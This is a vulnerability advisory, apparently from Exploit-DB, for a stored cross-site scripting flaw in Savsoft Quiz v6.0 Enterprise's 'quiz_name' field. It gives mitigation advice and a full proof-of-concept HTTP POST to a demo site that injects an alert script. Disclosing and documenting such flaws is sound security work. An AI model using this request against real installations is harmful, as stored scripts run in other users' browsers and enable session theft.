Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting

vendor:

Savsoft Quiz

by:

Eren Sen

6.1

CVSS

HIGH

Persistent Cross-Site Scripting (XSS)

CWE

Product Name: Savsoft Quiz

Affected Version From: Less than 6.0

Affected Version To: 6

Patch Exists: NO

Related CWE:

CPE: a:savsoft:quiz:6.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux, Windows 10

2024

Savsoft Quiz v6.0 Enterprise – Persistent Cross-Site Scripting

The Savsoft Quiz v6.0 Enterprise software is prone to a Persistent Cross-Site Scripting (XSS) vulnerability due to improper validation of user-supplied data in the 'quiz_name' parameter. An attacker can exploit this issue by injecting malicious scripts, potentially leading to the execution of arbitrary code in the context of the affected site. This vulnerability was tested on Kali Linux and Windows 10.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to filter out malicious inputs. Additionally, encoding user-supplied data before rendering it to the webpage can help prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
Scripting
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SAVSOFT QUIZ
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
# Version: < 6.0
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03

# Persistent Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: quiz_name

# Proof of Concepts:

https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13

# HTTP Request:

POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 411
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://demos1.softaculous.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=